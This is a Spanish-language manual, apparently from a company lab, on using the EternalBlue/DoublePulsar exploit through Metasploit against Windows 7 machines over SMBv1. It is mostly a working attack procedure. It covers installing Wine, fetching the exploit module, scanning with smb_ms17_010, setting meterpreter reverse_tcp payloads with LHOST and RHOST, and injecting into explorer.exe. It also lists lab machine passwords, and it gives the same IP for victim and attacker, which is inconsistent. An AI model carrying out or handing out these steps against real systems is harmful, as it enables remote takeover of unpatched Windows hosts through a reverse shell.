593-983581978 jbastidas@greenetics.

com
www.greenetics.com.ec

MANUAL DE EXPLOIT ETERNALBLUE

Introducción

EternalBlue es una herramienta que permite aprovechar la vulnerabilidad en el protocolo

SMB versión 1, y de esta manera poder ejecutar código remoto (RCE) sobre la máquina
víctima consiguiendo acceso al sistema.
El exploit hace un ataque directo a máquinas Windows, además de tener la ventaja de no
requerir autenticación. Este exploit fue empleado para la propagación del ransomeware
Wanna Cry el día 12 de mayo.

Requisitos

 Metasploit a la versión 4.14.27

 Wine de 32 y 64 bits

Actualización de Metasploit

1.- Dirigirse a la página de Kali Linux para actualizar la lista de repositorios para descarga
de actualizaciones

https://docs.kali.org/general-use/kali-linux-sources-list-repositories

2.- Buscar la opción Kali Rolling Repository y copiar la línea deb

http://http.kali.org/kali kali-rolling main contrib non-free al archivo source.list ubicado
en /etc/apt/source.list y comentar las demás líneas que habían en el archivo.
 593-983581978 jbastidas@greenetics.com
www.greenetics.com.ec

3.- Aplicar el comando msfupdate

4.- Una vez terminada la actualización, se abre la consola de metasploit con el comando
msfconsole para comprobar la nueva versión.
 593-983581978 jbastidas@greenetics.com
www.greenetics.com.ec

Instalación de Wine

Aplicar los siguientes comandos:

apt-get update -y
apt-get install wine -y
apt-get install winetricks -y
dpkg --add-architecture i386 && apt-get update && apt-get install wine32 -y --fix-missing

Configuración de Eternalblue

1.- Descargar el exploit desde el sitio de github:

https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit.git

2.- Una vez descargado el exploit se obtendrá un directorio Eternalblue-Doublepulsar-

Metasploit, cambiarse a dicho directorio y copiar el archivo eternalblue_doubleplusar.rb
a la siguiente ruta:

/usr/share/metasploit-framework/modules/exploits/windows/smb

3.- Crear el directorio drive_c

mkdir -p /root/.wine/drive_c/
 593-983581978 jbastidas@greenetics.com
www.greenetics.com.ec

Utilización del Exploit

El exploit se configura y ejecuta desde la consola de Metasploit, en primer lugar se debe

seleccionar una víctima que tenga un sistema operativo de Windows 7,
independientemente de la arquitectura. Una vez seleccionada la víctima se procede a
probar si la víctima es vulnerable a la vulnerabilidad SMB 1, para lo cual seguimos el
siguiente procedimiento:

1.- Abrir la consola de Metasploit, con el comando msfconsole

2.- Emplear el módulo de escaneo: smb_ms17_010

3.- Configurar el host (víctima) con el comando set RHOSTS 192.168.100.127, donde
192.168.100.127 es la dirección IP de la víctima.

4.- Ejecutar el exploit con el comando exploit

Una vez que se ha comprobado que el host escaneado es vulnerable, se procede a

emplear el exploit siguiendo los siguientes pasos:

1.- Emplear el módulo Eternalbluedoblupulsar, con el comando:

use exploit/windows/smb/eternalblue_doublepulsar
 593-983581978 jbastidas@greenetics.com
www.greenetics.com.ec

2. - Configurar el PAYLOAD, dependiendo de la arquitectura de la víctima aplicar el

payload correspondiente

set PAYLOAD windows/x64/meterpreter/reverse_tcp >> Windows de 64 bits

set PAYLOAD windows/meterpreter/reverse_tcp >> Windows de 32 bits

3.- Configurar la víctima

set RHOST 192.168.100.115

4.- Configurar la máquina que escucha la conexión (atacante)

set LHOST 192.168.100.115

5.- Configurar el nombre del proceso donde se va a crear el exploit

set PROCESSINJECT explorer.exe

6.- Ejecutar el exploit, con el comando exploit

 593-983581978 jbastidas@greenetics.com
www.greenetics.com.ec

Máquinas Virtuales:

Víctima:
 Windows Sandbox
 Sistema Operativo Windows 7 de 32 bits
 Clave de ingreso: root123

Windows Server 2008 R2

Clave de acceso adMin123$

Atacante:
 EternalBlue
 Sistema Operativo kali Linux de 64 bits
 Usuario: root, Clave: Greenetics

Información de versiones de Windows